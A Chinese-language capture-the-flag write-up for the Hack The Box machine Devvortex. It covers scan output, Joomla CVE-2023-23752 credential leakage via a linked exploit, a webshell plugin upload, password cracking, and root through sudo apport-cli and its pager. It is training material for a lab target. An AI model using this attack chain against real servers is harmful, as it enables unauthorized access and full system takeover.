一个Linux机器,属于简单难度。

靶场信息

一个Linux机器,属于简单难度。

信息收集

端口扫描

Nmap端口扫描:

kali@kali ~/D/H/M/Devvortex [SIGINT]> nmap -p- -n --min-rate 2000 -T4 10.10.11.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:30 EST
Nmap scan report for 10.10.11.242
Host is up (0.27s latency).
Not shown: 65463 filtered tcp ports (no-response), 70 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 66.15 seconds

初始权限

网页直接访问,会跳转至devvortex.htb,在hosts文件中添加记录。

使用ffuf进行子域名扫描:

kali@kali ~> ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1472ms]
:: Progress: [4989/4989] :: Job [1/1] :: 12 req/sec :: Duration: [0:02:06] :: Errors: 9 ::

dev.devvortex.htb子域名加到hosts文件中。

扫描目录文件:

kali@kali ~ [2]> ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://dev.devvortex.htb/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://dev.devvortex.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.gitreview              [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 1537ms]
administrator           [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 1002ms]
api                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 1002ms]
cache                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 470ms]
components              [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 914ms]
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 682ms]
includes                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 588ms]
language                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 415ms]
layouts                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 581ms]
libraries               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 409ms]
media                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 530ms]
modules                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 326ms]
plugins                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 552ms]
robots.txt              [Status: 200, Size: 764, Words: 78, Lines: 30, Duration: 2426ms]
templates               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 871ms]
tmp                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 885ms]
:: Progress: [4723/4723] :: Job [1/1] :: 41 req/sec :: Duration: [0:02:36] :: Errors: 119 ::

robots.txt文件显示是Joomla系统。

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

在URI:/administrator/manifests/files/joomla.xml可以查看具体版本信息:

<author>Joomla! Project</author>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>(C) 2019 Open Source Matters, Inc.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<version>4.2.6</version>
<creationDate>2022-12</creationDate>

对应的exp是:https://github.com/Acceis/exploit-CVE-2023-23752.git

通过exp泄露出登录信息,使用这些信息登录系统后台。

通过上传恶意的主题文件,得到webshell,进一步拿到初始权限。
https://github.com/p0dalirius/Joomla-webshell-plugin

用户权限

初始权限之后,使用linpeas收集信息:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      885/nginx: worker p 
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      885/nginx: worker p 
tcp6       0      0 :::22                   :::*                    LISTEN      -      

╔══════════╣ Users with console
logan:x:1000:1000:,,,:/home/logan:/bin/bash
root:x:0:0:root:/root:/bin/bash

lrwxrwxrwx 1 root root 44 Sep 25 16:40 /etc/nginx/sites-enabled/dev.devvortex.htb -> /etc/nginx/sites-available/dev.devvortex.htb
server {
    listen 80;
    server_name dev.devvortex.htb;
    root /var/www/dev.devvortex.htb;
    index index.html index.htm index.php;
    charset utf-8;
    access_log /var/log/nginx/dev.devvortex.htb.access.log;
    error_log /var/log/nginx/dev.devvortex.htb.error.log info;
    location / {
        try_files $uri $uri/ /index.php?$args;
    }
    location ~* /(images|cache|media|logs|tmp)/.*.(php|pl|py|jsp|asp|sh|cgi)$ {
        return 403;
        error_page 403 /403_error.html;
    }
    location = /favicon.ico { access_log off; log_not_found off; }
    location = /robots.txt  { access_log off; log_not_found off; }
    error_page 404 /index.php;
    location ~ .php$ {
        fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include /etc/nginx/fastcgi.conf;
    }
    location ~ /\.(?!well-known).* {
        deny all;
    }
    location /api/ {
	try_files $uri $uri/ /api/index.php?$args;
    }
}

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/logan/.bash_history
/home/logan/user.txt
/root/
/var/www
/var/www/dev.devvortex.htb/templates/cassiopeia/cassiopeia/index.php
/var/www/dev.devvortex.htb/templates/cassiopeia/cassiopeia/component.php
/var/www/dev.devvortex.htb/templates/cassiopeia/index.php
/var/www/dev.devvortex.htb/templates/cassiopeia/component.php

可以登录的用户是logan,进数据库导出密码、然后使用john破解,得到用户密码。

root权限

知道密码的情况下,查看能sudo执行的命令:

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

查看对应漏洞信息:
https://github.com/advisories/GHSA-qgrc-7333-5cgx

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.

成功root:

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?


Choices:
  1: Display (X.org)
  2: External or internal storage devices (e. g. USB sticks)
  3: Security related problems
  4: Sound/audio related problems
  5: dist-upgrade
  6: installation
  7: installer
  8: release-upgrade
  9: ubuntu-release-upgrader
  10: Other problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1


*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

*** What display problem do you observe?


Choices:
  1: I don't know
  2: Freezes or hangs during boot or usage
  3: Crashes or restarts back to login screen
  4: Resolution is incorrect
  5: Shows screen corruption
  6: Performance is worse than expected
  7: Fonts are the wrong size
  8: Other display-related problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 2

*** 

To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze

Press any key to continue... 

..dpkg-query: no packages found matching xorg
................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.5 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# ls
user.txt
root@devvortex:/home/logan# whoami
root

总结

回顾过程感觉很简单,实际测试时拿初始权限花了很长时间。